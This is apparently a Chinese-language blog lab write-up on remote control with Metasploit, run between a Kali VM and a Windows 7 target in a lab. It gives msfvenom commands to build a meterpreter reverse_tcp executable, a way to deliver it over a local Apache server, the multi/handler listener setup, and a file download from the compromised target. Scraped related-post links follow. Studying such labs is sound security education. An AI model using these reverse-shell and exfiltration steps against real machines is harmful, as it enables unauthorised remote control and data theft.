【简单远程控制】 Metasploit应用
文章目录
- 一、实验环境
- 二、实验内容
- 1、生成主控端、被控端。
- 2、获得靶机(Windows)控制权。
- 3、下载靶机上任意一个文件。
- 三、实验步骤
一、实验环境
kali虚拟机,靶机win7,(都为NAT模式)
二、实验内容
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
三、实验步骤
(1)在kali生成被控端
打开kali终端输入命令,在本地生成攻击荷载
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.47.128 lport=5000 -f exe -o /root/payload.exe
生成完毕,在将该荷载放到目标靶机上,此时kali就是主控端,靶机是被控端。
PS:在把荷载复制到目标靶机上的时候,可以先把它移动到主机,在从主机移动到靶机;也可以在kali搭建一个网站,将下载链接挂上去,再用靶机去访问这个网站,从而下载下来。(记录一下第二个方法的步骤)
①先在终端查看荷载的存放位置,输入命令ls;
②将荷载的目录地址复制过来,挂到网页上,文件名是 1.exe
命令:cd ./payload/var/www/html/1.exe
③输入命令:
service apache2 start
service apache2 status
cd /var/www/html
ls
④在kali的浏览器里输入环回地址:127.0.0.1/1.exe
⑤最后去靶机的浏览器输入命令:192.168.47.128/1.exe 即可下载
(2)获得靶机(Windows)的控制权
1.打开kali终端,输入msfconsole命令即可打开Metasploit
2.使用攻击模块
输入命令:
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.47.128set lport 5000exploit
3.然后打开靶机,多次点击攻击荷载,此时kali已经开始监听靶机的行为,我们从网上下载一张图片,下载了以后,在kali也会出现靶机所下载的内容
(3)下载靶机上的任一文件
1.我们直接下载刚刚靶机下载的那种图片即可,输入download命令
2.最后打开kali的文件夹,输入下载的图片的存放目录/home/,找到了靶机下载的那张图片,我们已经将他下载下来,复现完毕!
【简单远程控制】 Metasploit应用相关推荐
- 简单远程控制 Metasploit应用
二.Metasploit应用 1.生成主控端.被控端. 2.获得靶机(Windows)控制权. 3.下载靶机上任意一个文件. P121-123;140-149 在kali中输入命令 msfvenom ...
- Qt:Qt实现Winsock网络编程—非阻塞模式下的简单远程控制的开发(WSAAsyncSelect)
Qt实现Winsock网络编程-非阻塞模式下的简单远程控制的开发(WSAAsyncSelect) 前言 这边博客应该是 Qt实现Winsock网络编程-TCP服务端和客户端通信(多线程) 的姐妹篇,上 ...
- Ubuntu的简单远程控制和远程桌面
安全方便的简单控制-ssh 安装服务器:apt-get ssh,服务器基本不用怎么配置就可以使用. 客户端一版不用安装,Linux都自带了,windows平台下可以使用putty ,非常好用. 操作命 ...
- linux搭建服务器ppt,Linux服务器远程控制搭建.ppt
<Linux服务器远程控制搭建.ppt>由会员分享,可在线阅读,更多相关<Linux服务器远程控制搭建.ppt(14页珍藏版)>请在装配图网上搜索. 1.企业服务器远程控制搭建 ...
- 20169220 网络攻防实践 第二周学习总结
20169220 赵京鸣 2016/2017-2 第二周学习总结 进度:1.教材第1-2章/12章 2.Kali教学视频1-5/36 3.查找2个安全工具/5 4.国内外黑客.电影书籍了解 5.lin ...
- 将文件从 Linux 传输到 Windows
很多时候,在参与活动中,我发现自己需要将工具或有效载荷从我的Kali linux攻击箱复制到受损的Windows机器上. ColdFusion服务器,并能够上传一个CFM webshell.这是一个非 ...
- 小度音箱对接之小度APP功能分析
本文,旨在分析小度APP中,关于智能控制相关的功能. 文中,以美的美居为例. 文章目录 小度APP介绍 首页栏目 技能栏目 VIP栏目 小度购栏目 我的栏目 智能家居模块 添加设备 设备控制 小结 小 ...
- Metasploit Framework(1)基本命令、简单使用
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 基本的控制台命令介绍: banner 查看metasp ...
- 从入门到入土:基于C语言采用UDP协议实现远程控制|详细说明|利用流套接字实现一个简单的远程控制系统|代码展示
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
最新文章
- Windows下安装XAMPP,Wordpress
- Flask开发服务器启动方式
- 深度学习框架简史 (A Brief History of Deep Learning Frameworks)
- https://github.com/fendouai/Awesome-Chatbot
- UPS不间断电源常见故障及如何排除故障
- 笔记-信息化与系统集成技术-智慧城市建设参考模型
- Spring Boot——易班优课YOOC课群在线测试自动答题解决方案(六)后端改造
- 深入C#中的String类
- 别把机器学习和人工智能搞混了! 1
- VS 15 预览 5 中 VB 15 新增的功能
- C++多态虚函数/纯虚函数demo
- linux退出热键_LINUX常用快捷键
- 抽象代数学习笔记(抽象代数的历史、运算)
- C语言的printf输出格式控制
- Snaker的回退流程源码分析
- 有没有测试适合哪种发型的颜色软件,染发小测试 看看你的头发适合哪种颜色...
- windows 重置路由表
- VScode 常用必备插件
- 侯捷C++学习记录-面向对象高级编程上
- AntiVir UNIX 在Ubuntu 8.04下的安装
热门文章
- Win7电脑无法进入睡眠模式?
- Matlab如何绘制小提琴图?
- mac安装jekyll
- 使用Jekyll + GitHub 搭建自己的博客
- 爆火书单视频怎么制作?实用制作教程来了
- 游戏获取服务器信息,易语言获取游戏服务器信息
- 工信部:将实施国家软件重大工程解决关键软件“卡脖子”问题丨权威发布
- vue解析excel文件(使用xlsx)
- dilated convolution
- 编程语言python这个词怎么翻译_五大理由从 Python 转到 Go 语言【已翻译100%】...